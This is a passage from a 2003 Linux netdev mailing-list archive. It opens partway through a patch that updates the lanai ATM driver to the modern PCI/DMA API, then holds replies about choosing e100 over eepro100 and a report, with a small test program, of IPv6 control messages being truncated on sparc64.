7=128k) */ +static int lanai_buf_size_cardorder(const struct lanai_buffer *buf) { - unsigned long r = virt_to_bus(buf->start); - APRINTK((r & ~0xFFFFFF00) == 0, "bad dmaaddr: 0x%lx\n", (long) r); - return r; + int order = get_order(lanai_buf_size(buf)) + (PAGE_SHIFT - 10); + + /* This can only happen if PAGE_SIZE is gigantic, but just in case */ + if (order > 7) + order = 7; + return order; } /* -------------------- HANDLE BACKLOG_VCCS BITFIELD: */ @@ -492,7 +480,7 @@ Reset_Reg = 0x00, /* Reset; read for chip type; bits: */ #define RESET_GET_BOARD_REV(x) (((x)>> 0)&0x03) /* Board revision */ #define RESET_GET_BOARD_ID(x) (((x)>> 2)&0x03) /* Board ID */ -#define BOARD_ID_LANAI256 (0) /* 25.6M adaptor card */ +#define BOARD_ID_LANAI256 (0) /* 25.6M adapter card */ Endian_Reg = 0x04, /* Endian setting */ IntStatus_Reg = 0x08, /* Interrupt status */ IntStatusMasked_Reg = 0x0C, /* Interrupt status (masked) */ @@ -850,7 +838,7 @@ { u32 addr1; if (lvcc->rx.atmvcc->qos.aal == ATM_AAL5) { - unsigned long dmaaddr = lanai_buf_dmaaddr(&lvcc->rx.buf); + dma_addr_t dmaaddr = lvcc->rx.buf.dmaaddr; cardvcc_write(lvcc, 0xFFFF, vcc_rxcrc1); cardvcc_write(lvcc, 0xFFFF, vcc_rxcrc2); cardvcc_write(lvcc, 0, vcc_rxwriteptr); @@ -872,7 +860,7 @@ static void host_vcc_start_tx(const struct lanai_vcc *lvcc) { - unsigned long dmaaddr = lanai_buf_dmaaddr(&lvcc->tx.buf); + dma_addr_t dmaaddr = lvcc->tx.buf.dmaaddr; cardvcc_write(lvcc, 0, vcc_txicg); cardvcc_write(lvcc, 0xFFFF, vcc_txcrc1); cardvcc_write(lvcc, 0xFFFF, vcc_txcrc2); @@ -971,14 +959,15 @@ static inline int aal0_buffer_allocate(struct lanai_dev *lanai) { DPRINTK("aal0_buffer_allocate: allocating AAL0 RX buffer\n"); - lanai_buf_allocate(&lanai->aal0buf, AAL0_RX_BUFFER_SIZE, 80); - return (lanai->aal0buf.order < 0) ? -ENOMEM : 0; + lanai_buf_allocate(&lanai->aal0buf, AAL0_RX_BUFFER_SIZE, 80, + lanai->pci); + return (lanai->aal0buf.start == NULL) ? 
-ENOMEM : 0; } static inline void aal0_buffer_free(struct lanai_dev *lanai) { DPRINTK("aal0_buffer_allocate: freeing AAL0 RX buffer\n"); - lanai_buf_deallocate(&lanai->aal0buf); + lanai_buf_deallocate(&lanai->aal0buf, lanai->pci); } /* -------------------- EEPROM UTILITIES: */ @@ -1678,36 +1667,37 @@ return lvcc; } -static int lanai_get_sized_buffer(int number, struct lanai_buffer *buf, - int max_sdu, int multiplier, int min, const char *name) +static int lanai_get_sized_buffer(struct lanai_dev *lanai, + struct lanai_buffer *buf, int max_sdu, int multiplier, + int min, const char *name) { int size; if (max_sdu < 1) max_sdu = 1; max_sdu = aal5_size(max_sdu); size = (max_sdu + 16) * multiplier + 16; - lanai_buf_allocate(buf, size, min); - if (buf->order < 0) + lanai_buf_allocate(buf, size, min, lanai->pci); + if (buf->start == NULL) return -ENOMEM; if (lanai_buf_size(buf) < size) printk(KERN_WARNING DEV_LABEL "(itf %d): wanted %d bytes " - "for %s buffer, got only %d\n", number, size, name, + "for %s buffer, got only %d\n", lanai->number, size, name, lanai_buf_size(buf)); DPRINTK("Allocated %d byte %s buffer\n", lanai_buf_size(buf), name); return 0; } /* Setup a RX buffer for a currently unbound AAL5 vci */ -static inline int lanai_setup_rx_vci_aal5(int number, struct lanai_vcc *lvcc, - const struct atm_qos *qos) +static inline int lanai_setup_rx_vci_aal5(struct lanai_dev *lanai, + struct lanai_vcc *lvcc, const struct atm_qos *qos) { - return lanai_get_sized_buffer(number, &lvcc->rx.buf, + return lanai_get_sized_buffer(lanai, &lvcc->rx.buf, qos->rxtp.max_sdu, AAL5_RX_MULTIPLIER, qos->rxtp.max_sdu + 32, "RX"); } /* Setup a TX buffer for a currently unbound AAL5 vci */ -static int lanai_setup_tx_vci(int number, struct lanai_vcc *lvcc, +static int lanai_setup_tx_vci(struct lanai_dev *lanai, struct lanai_vcc *lvcc, const struct atm_qos *qos) { int max_sdu, multiplier; @@ -1720,7 +1710,7 @@ max_sdu = qos->txtp.max_sdu; multiplier = AAL5_TX_MULTIPLIER; } - return 
lanai_get_sized_buffer(number, &lvcc->tx.buf, max_sdu, + return lanai_get_sized_buffer(lanai, &lvcc->tx.buf, max_sdu, multiplier, 80, "TX"); } @@ -1781,8 +1771,9 @@ */ static int __init service_buffer_allocate(struct lanai_dev *lanai) { - lanai_buf_allocate(&lanai->service, SERVICE_ENTRIES * 4, 0); - if (lanai->service.order < 0) + lanai_buf_allocate(&lanai->service, SERVICE_ENTRIES * 4, 8, + lanai->pci); + if (lanai->service.start == NULL) return -ENOMEM; DPRINTK("allocated service buffer at 0x%08lX, size %d(%d)\n", (unsigned long) lanai->service.start, @@ -1793,14 +1784,14 @@ /* ServiceStuff register contains size and address of buffer */ reg_write(lanai, SSTUFF_SET_SIZE(lanai_buf_size_cardorder(&lanai->service)) | - SSTUFF_SET_ADDR(lanai_buf_dmaaddr(&lanai->service)), + SSTUFF_SET_ADDR(lanai->service.dmaaddr), ServiceStuff_Reg); return 0; } static inline void service_buffer_deallocate(struct lanai_dev *lanai) { - lanai_buf_deallocate(&lanai->service); + lanai_buf_deallocate(&lanai->service, lanai->pci); } /* Bitfields in service list */ @@ -2098,11 +2089,28 @@ /* -------------------- PCI INITIALIZATION/SHUTDOWN: */ -static inline int __init lanai_pci_start(struct lanai_dev *lanai) +static int __init lanai_pci_start(struct lanai_dev *lanai) { struct pci_dev *pci = lanai->pci; int result; u16 w; + + if (pci_enable_device(pci) != 0) { + printk(KERN_ERR DEV_LABEL "(itf %d): can't enable " + "PCI device", lanai->number); + return -ENXIO; + } + pci_set_master(pci); + if (pci_set_dma_mask(pci, 0xFFFFFFFF) != 0) { + printk(KERN_WARNING DEV_LABEL + "(itf %d): No suitable DMA available.\n", lanai->number); + return -EBUSY; + } + if (pci_set_consistent_dma_mask(pci, 0xFFFFFFFF) != 0) { + printk(KERN_WARNING DEV_LABEL + "(itf %d): No suitable DMA available.\n", lanai->number); + return -EBUSY; + } /* Get the pci revision byte */ result = pci_read_config_byte(pci, PCI_REVISION_ID, &lanai->pci_revision); @@ -2113,7 +2121,8 @@ } result = pci_read_config_word(pci, 
PCI_SUBSYSTEM_ID, &w); if (result != PCIBIOS_SUCCESSFUL) { - printk(KERN_ERR DEV_LABEL "(itf %d): can't read PCI_SUBSYSTEM_ID: %d\n", lanai->number, result); + printk(KERN_ERR DEV_LABEL "(itf %d): can't read " + "PCI_SUBSYSTEM_ID: %d\n", lanai->number, result); return -EINVAL; } if ((result = check_board_id_and_rev("PCI", w, NULL)) != 0) @@ -2125,43 +2134,11 @@ "PCI_LATENCY_TIMER: %d\n", lanai->number, result); return -EINVAL; } - result = pci_read_config_word(pci, PCI_COMMAND, &w); - if (result != PCIBIOS_SUCCESSFUL) { - printk(KERN_ERR DEV_LABEL "(itf %d): can't read " - "PCI_COMMAND: %d\n", lanai->number, result); - return -EINVAL; - } - w |= (PCI_COMMAND_MEMORY | PCI_COMMAND_MASTER | PCI_COMMAND_SERR | - PCI_COMMAND_PARITY); - result = pci_write_config_word(pci, PCI_COMMAND, w); - if (result != PCIBIOS_SUCCESSFUL) { - printk(KERN_ERR DEV_LABEL "(itf %d): can't " - "write PCI_COMMAND: %d\n", lanai->number, result); - return -EINVAL; - } pcistatus_check(lanai, 1); pcistatus_check(lanai, 0); return 0; } -static void lanai_pci_stop(struct lanai_dev *lanai) -{ - struct pci_dev *pci = lanai->pci; - int result; - u16 pci_command; - result = pci_read_config_word(pci, PCI_COMMAND, &pci_command); - if (result != PCIBIOS_SUCCESSFUL) { - printk(KERN_ERR DEV_LABEL "(itf %d): can't " - "read PCI_COMMAND: %d\n", lanai->number, result); - return; - } - pci_command &= ~(PCI_COMMAND_MEMORY | PCI_COMMAND_MASTER); - result = pci_write_config_word(pci, PCI_COMMAND, pci_command); - if (result != PCIBIOS_SUCCESSFUL) - printk(KERN_ERR DEV_LABEL "(itf %d): can't " - "write PCI_COMMAND: %d\n", lanai->number, result); -} - /* -------------------- VPI/VCI ALLOCATION: */ /* @@ -2445,7 +2422,7 @@ #endif iounmap((void *) lanai->base); error_pci: - lanai_pci_stop(lanai); + pci_disable_device(lanai->pci); error: return result; } @@ -2470,7 +2447,7 @@ lanai->conf1 |= CONFIG1_POWERDOWN; conf1_write(lanai); #endif - lanai_pci_stop(lanai); + pci_disable_device(lanai->pci); 
vcc_table_deallocate(lanai); service_buffer_deallocate(lanai); iounmap((void *) lanai->base); @@ -2493,7 +2470,7 @@ if (--lanai->naal0 <= 0) aal0_buffer_free(lanai); } else - lanai_buf_deallocate(&lvcc->rx.buf); + lanai_buf_deallocate(&lvcc->rx.buf, lanai->pci); lvcc->rx.atmvcc = NULL; } if (lvcc->tx.atmvcc == atmvcc) { @@ -2503,7 +2480,7 @@ lanai->cbrvcc = NULL; } lanai_shutdown_tx_vci(lanai, lvcc); - lanai_buf_deallocate(&lvcc->tx.buf); + lanai_buf_deallocate(&lvcc->tx.buf, lanai->pci); lvcc->tx.atmvcc = NULL; } if (--lvcc->nref == 0) { @@ -2551,7 +2528,7 @@ result = aal0_buffer_allocate(lanai); } else result = lanai_setup_rx_vci_aal5( - lanai->number, lvcc, &atmvcc->qos); + lanai, lvcc, &atmvcc->qos); if (result != 0) goto out_free; lvcc->rx.atmvcc = atmvcc; @@ -2566,7 +2543,7 @@ if (atmvcc->qos.txtp.traffic_class != ATM_NONE) { APRINTK(lvcc->tx.atmvcc == NULL, "tx.atmvcc!=NULL, vci=%d\n", vci); - result = lanai_setup_tx_vci(lanai->number, lvcc, &atmvcc->qos); + result = lanai_setup_tx_vci(lanai, lvcc, &atmvcc->qos); if (result != 0) goto out_free; lvcc->tx.atmvcc = atmvcc; @@ -2849,49 +2826,69 @@ .proc_read = lanai_proc_read }; -/* detect one type of card LANAI2 or LANAIHB */ -static int __init lanai_detect_1(unsigned int vendor, unsigned int device) +/* initialize one probed card */ +static int __devinit lanai_init_one(struct pci_dev *pci, + const struct pci_device_id *ident) { - struct pci_dev *pci = NULL; struct lanai_dev *lanai; struct atm_dev *atmdev; - int count = 0, result; - while ((pci = pci_find_device(vendor, device, pci)) != NULL) { - lanai = (struct lanai_dev *) - kmalloc(sizeof *lanai, GFP_KERNEL); - if (lanai == NULL) { - printk(KERN_ERR DEV_LABEL ": couldn't allocate " - "dev_data structure!\n"); - break; - } - atmdev = atm_dev_register(DEV_LABEL, &ops, -1, 0); - if (atmdev == NULL) { - printk(KERN_ERR DEV_LABEL ": couldn't register " - "atm device!\n"); - kfree(lanai); - break; - } - atmdev->dev_data = lanai; - lanai->pci = pci; - lanai->type = 
(enum lanai_type) device; - if ((result = lanai_dev_open(atmdev)) != 0) { - DPRINTK("lanai_start() failed, err=%d\n", -result); - atm_dev_deregister(atmdev); - kfree(lanai); - continue; - } - count++; + int result; + + lanai = (struct lanai_dev *) kmalloc(sizeof(*lanai), GFP_KERNEL); + if (lanai == NULL) { + printk(KERN_ERR DEV_LABEL + ": couldn't allocate dev_data structure!\n"); + return -ENOMEM; + } + + atmdev = atm_dev_register(DEV_LABEL, &ops, -1, 0); + if (atmdev == NULL) { + printk(KERN_ERR DEV_LABEL + ": couldn't register atm device!\n"); + kfree(lanai); + return -EBUSY; + } + + atmdev->dev_data = lanai; + lanai->pci = pci; + lanai->type = (enum lanai_type) ident->device; + + result = lanai_dev_open(atmdev); + if (result != 0) { + DPRINTK("lanai_start() failed, err=%d\n", -result); + atm_dev_deregister(atmdev); + kfree(lanai); } - return count; + return result; } +static struct pci_device_id lanai_pci_tbl[] __devinitdata = { + { + PCI_VENDOR_ID_EF, PCI_VENDOR_ID_EF_ATM_LANAI2, + PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 + }, + { + PCI_VENDOR_ID_EF, PCI_VENDOR_ID_EF_ATM_LANAIHB, + PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 + }, + { 0, } /* terminal entry */ +}; +MODULE_DEVICE_TABLE(pci, lanai_pci_tbl); + +static struct pci_driver lanai_driver = { + .name = DEV_LABEL, + .id_table = lanai_pci_tbl, + .probe = lanai_init_one, +}; + static int __init lanai_module_init(void) { - if (lanai_detect_1(PCI_VENDOR_ID_EF, PCI_VENDOR_ID_EF_ATM_LANAI2) + - lanai_detect_1(PCI_VENDOR_ID_EF, PCI_VENDOR_ID_EF_ATM_LANAIHB)) - return 0; - printk(KERN_ERR DEV_LABEL ": no adaptor found\n"); - return -ENODEV; + int x; + + x = pci_module_init(&lanai_driver); + if (x != 0) + printk(KERN_ERR DEV_LABEL ": no adapter found\n"); + return x; } static void __exit lanai_module_exit(void) From davem@redhat.com Mon Jul 28 07:15:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 07:15:16 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com 
(8.12.9/8.12.9) with SMTP id h6SEF7Fl019037 for ; Mon, 28 Jul 2003 07:15:07 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id HAA28582; Mon, 28 Jul 2003 07:11:57 -0700 Date: Mon, 28 Jul 2003 07:11:57 -0700 From: "David S. Miller" To: Pekka Pietikainen Cc: zagarna@yahoo.com, netdev@oss.sgi.com Subject: Re: b44 module problems Message-Id: <20030728071157.0ad6f726.davem@redhat.com> In-Reply-To: <20030728095631.GA6946@ee.oulu.fi> References: <20030728114302.1cbb6f70.zagarna@yahoo.com> <20030728095631.GA6946@ee.oulu.fi> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4339 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 12:56:31 +0300 Pekka Pietikainen wrote: > You're not trying to use ipv6 or have the module loaded by any chance? When working > on the driver I had similar problems with rmmod on 2.5 when the ipv6 module > was loaded, without it unloading worked just fine (if I understood correctly, > this is a known problem with all ethernet drivers). Yes, and this is fixed in 2.6.0-test2 From davem@redhat.com Mon Jul 28 07:35:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 07:35:57 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SEZrFl020990 for ; Mon, 28 Jul 2003 07:35:53 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id HAA28677; Mon, 28 Jul 2003 07:32:40 -0700 Date: Mon, 28 Jul 2003 07:32:40 -0700 From: "David S. 
Miller" To: Cedric Gavage Cc: alan@lxorguk.ukuu.org.uk, jgarzik@pobox.com, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030728073240.03ff1c2e.davem@redhat.com> In-Reply-To: <3F24D31F.5050904@unixtech.be> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E7435.4060308@unixtech.be> <20030727163422.28e44736.davem@redhat.com> <3F24D31F.5050904@unixtech.be> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4340 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 09:39:11 +0200 Cedric Gavage wrote: > David S. Miller wrote: > > On Wed, 23 Jul 2003 13:40:37 +0200 > > Cedric Gavage wrote: > > > >>Ok, now it's e100 driver, I will wait some hours to see if we have again > >>problems, thanks for your help. > > > > Any problems yet? > > It's ok now... I was waiting some hours (days) to see if it was really ok ;) > > Thanks for your help. No problem. 
Alan and Jeff, please note, executive summary: 1) 'eepro100' driver in 2.4.x + high end EFNET IRC server == crashes 2) same as #1 using 'e100' driver == works From davem@redhat.com Mon Jul 28 07:43:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 07:43:08 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SEh4Fl021739 for ; Mon, 28 Jul 2003 07:43:05 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id HAA28725; Mon, 28 Jul 2003 07:39:41 -0700 Date: Mon, 28 Jul 2003 07:39:40 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, mitch@sfgoth.com, netdev@oss.sgi.com Subject: Re: [atmdrvr lanai] PATCH: update to modern DMA/PCI api, etc Message-Id: <20030728073940.419ffb98.davem@redhat.com> In-Reply-To: <200307281353.h6SDrHsG009681@ginger.cmf.nrl.navy.mil> References: <20030728045620.GJ32831@gaz.sfgoth.com> <200307281353.h6SDrHsG009681@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4341 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 09:50:35 -0400 chas williams wrote: > dave, please apply the following patch from mitch: Done, thanks guys. 
From garzik@gtf.org Mon Jul 28 08:07:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 08:07:50 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SF7jFl023749 for ; Mon, 28 Jul 2003 08:07:46 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 86CC76611; Mon, 28 Jul 2003 11:07:37 -0400 (EDT) Date: Mon, 28 Jul 2003 11:07:37 -0400 From: Jeff Garzik To: "David S. Miller" Cc: Cedric Gavage , alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-ID: <20030728150737.GB1399@gtf.org> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E7435.4060308@unixtech.be> <20030727163422.28e44736.davem@redhat.com> <3F24D31F.5050904@unixtech.be> <20030728073240.03ff1c2e.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030728073240.03ff1c2e.davem@redhat.com> User-Agent: Mutt/1.3.28i X-archive-position: 4342 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Mon, Jul 28, 2003 at 07:32:40AM -0700, David S. Miller wrote: > On Mon, 28 Jul 2003 09:39:11 +0200 > Cedric Gavage wrote: > > > David S. Miller wrote: > > > On Wed, 23 Jul 2003 13:40:37 +0200 > > > Cedric Gavage wrote: > > > > > >>Ok, now it's e100 driver, I will wait some hours to see if we have again > > >>problems, thanks for your help. > > > > > > Any problems yet? > > > > It's ok now... I was waiting some hours (days) to see if it was really ok ;) > > > > Thanks for your help. > > No problem. 
> > Alan and Jeff, please note, executive summary: > > 1) 'eepro100' driver in 2.4.x + high end EFNET IRC server == crashes > 2) same as #1 using 'e100' driver == works My Official Story(tm) is currently * use e100 * unless you really really want to use eepro100 eepro100 in the kernel tree is essentially unmaintained. One of the big reasons I merged e100 is that it has an active maintainer with full access to docs. Jeff From felix@allot.com Mon Jul 28 08:31:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 08:31:37 -0700 (PDT) Received: from mxout5.netvision.net.il (mxout5.netvision.net.il [194.90.9.29]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SFVTFl027426 for ; Mon, 28 Jul 2003 08:31:31 -0700 Received: from exg.allot.com ([199.203.223.202]) by mxout5.netvision.net.il (iPlanet Messaging Server 5.2 HotFix 1.14 (built Mar 18 2003)) with ESMTP id <0HIQ007G9R2ZC0@mxout5.netvision.net.il> for netdev@oss.sgi.com; Mon, 28 Jul 2003 18:30:35 +0300 (IDT) Received: from allot.com (199.203.223.201 [199.203.223.201]) by exg.allot.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id PZL9SLWK; Mon, 28 Jul 2003 18:33:28 +0200 Date: Mon, 28 Jul 2003 18:30:49 +0300 From: Felix Radensky Subject: Re: [Fwd: kernel 2.4.21] To: Jeff Garzik Cc: "David S. Miller" , Cedric Gavage , alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Message-id: <3F2541A9.8030407@allot.com> Organization: Allot Communications Ltd. 
MIME-version: 1.0 Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT X-Accept-Language: en-us, en User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E7435.4060308@unixtech.be> <20030727163422.28e44736.davem@redhat.com> <3F24D31F.5050904@unixtech.be> <20030728073240.03ff1c2e.davem@redhat.com> <20030728150737.GB1399@gtf.org> X-archive-position: 4343 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: felix@allot.com Precedence: bulk X-list: netdev Then maybe it makes sense to enable e100 by default and not eepro100 ? Felix. Jeff Garzik wrote: > > >My Official Story(tm) is currently > >* use e100 >* unless you really really want to use eepro100 > >eepro100 in the kernel tree is essentially unmaintained. One of the >big reasons I merged e100 is that it has an active maintainer with >full access to docs. > > Jeff > > > > > > From davem@redhat.com Mon Jul 28 08:32:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 08:33:04 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SFWxFl027827 for ; Mon, 28 Jul 2003 08:32:59 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id IAA29142; Mon, 28 Jul 2003 08:29:15 -0700 Date: Mon, 28 Jul 2003 08:29:15 -0700 From: "David S. 
Miller" To: Jan Oravec Cc: kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Re: kernel bug: control message on AF_INET6 sockets strangely truncated on sparc64 platform Message-Id: <20030728082915.67d74b31.davem@redhat.com> In-Reply-To: <20030728151849.GA18408@wsx.ksp.sk> References: <20030728151849.GA18408@wsx.ksp.sk> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4344 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev

On Mon, 28 Jul 2003 17:18:49 +0200 Jan Oravec wrote:

> while trying to setup IPv6-capable bind DNS server on UltraSparc II box,
> i have found the following problem:

Yes, this is an unfortunate consequence of how we emulate socket CMSGs in 32-bit applications running on a 64-bit kernel in 2.4.x.

It is not easily fixable in 2.4.x; in fact it would be such an intrusive and bug-prone change that I'm probably not going to fix it in 2.4.x.

The workaround in the app is to use slightly larger than necessary CMSG buffers. Sorry :(

2.5.x/2.6.x does things properly and the bug shouldn't show up there.
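A minimal sketch of the workaround mentioned above (over-allocating the control buffer), not code from the thread. The helper names `padded_control_len` and `prepare_recv` and the 16-byte `CMSG_SLACK` are assumptions made for illustration; the message only says "slightly larger than necessary" and gives no figure. The payload length is passed in as a plain number so the sketch does not depend on any particular option structure.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

/* Hypothetical safety margin in bytes; the thread gives no exact value. */
#define CMSG_SLACK 16

/* Bytes to reserve for one control message carrying payload_len bytes,
 * using CMSG_SPACE (header + payload + alignment padding) plus the margin. */
static size_t padded_control_len(size_t payload_len)
{
    return CMSG_SPACE(payload_len) + CMSG_SLACK;
}

/* Fill in a msghdr for recvmsg() with an over-sized control buffer.
 * Returns 0 on success, -1 if the caller's control buffer is too small. */
static int prepare_recv(struct msghdr *mh, struct iovec *iov,
                        void *data, size_t data_len,
                        void *ctl, size_t ctl_cap, size_t payload_len)
{
    size_t need = padded_control_len(payload_len);

    if (ctl_cap < need)
        return -1;

    memset(mh, 0, sizeof(*mh));
    iov->iov_base = data;
    iov->iov_len = data_len;
    mh->msg_iov = iov;
    mh->msg_iovlen = 1;
    mh->msg_control = ctl;
    mh->msg_controllen = need;   /* deliberately more than CMSG_LEN(payload_len) */
    return 0;
}
```

For an IPV6_PKTINFO receiver the caller would pass `sizeof(struct in6_pktinfo)` as `payload_len`. After `recvmsg()`, testing `msg_flags & MSG_CTRUNC` shows whether the control data was still truncated.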
From wsx@6com.sk Mon Jul 28 08:49:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 08:49:50 -0700 (PDT) Received: from mail.6com.sk (cement.ksp.edi.fmph.uniba.sk [158.195.16.151] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SFnMFl030034 for ; Mon, 28 Jul 2003 08:49:23 -0700 Received: by mail.6com.sk (Postfix, from userid 501) id 5145A16BB7; Mon, 28 Jul 2003 17:18:49 +0200 (CEST) Date: Mon, 28 Jul 2003 17:18:49 +0200 From: Jan Oravec To: davem@redhat.com, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: kernel bug: control message on AF_INET6 sockets strangely truncated on sparc64 platform Message-ID: <20030728151849.GA18408@wsx.ksp.sk> Reply-To: Jan Oravec Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4.1i X-Operating-System: UNIX X-archive-position: 4345 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jan.oravec@6com.sk Precedence: bulk X-list: netdev

Hello,

While trying to set up an IPv6-capable BIND DNS server on an UltraSparc II box, I found the following problem. Consider this program:

/* header names were stripped in the archive; the five below are what the code requires */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main()
{
        int fd;
        struct sockaddr_in6 sin;
        char buf0[1000];
        char buf1[1000];
        char buf2[1000];
        struct msghdr mhdr;
        struct iovec iov;
        int on=1;

        mhdr.msg_name=buf0;
        mhdr.msg_namelen=1000;
        mhdr.msg_iov=&iov;
        mhdr.msg_iovlen=1;
        mhdr.msg_control=buf1;
        /* control buffer length is exactly one in6_pktinfo message */
        mhdr.msg_controllen=CMSG_LEN(sizeof(struct in6_pktinfo));
        mhdr.msg_flags=0;
        iov.iov_base=buf2;
        iov.iov_len=1000;

        printf("clen_init=%d\n", mhdr.msg_controllen);

        fd=socket(AF_INET6, SOCK_DGRAM, 0);
        setsockopt(fd, IPPROTO_IPV6, IPV6_PKTINFO, &on, sizeof(on));
        sin.sin6_port=htons(4747);
        memset(&sin.sin6_addr, 0, 16);
        bind(fd, &sin, sizeof(struct sockaddr_in6));

        recvmsg(fd, &mhdr, 0);
        printf("clen=%d flags=%d\n", mhdr.msg_controllen, mhdr.msg_flags);
        return 0;
}

After running it and sending any IPv6 UDP packet to
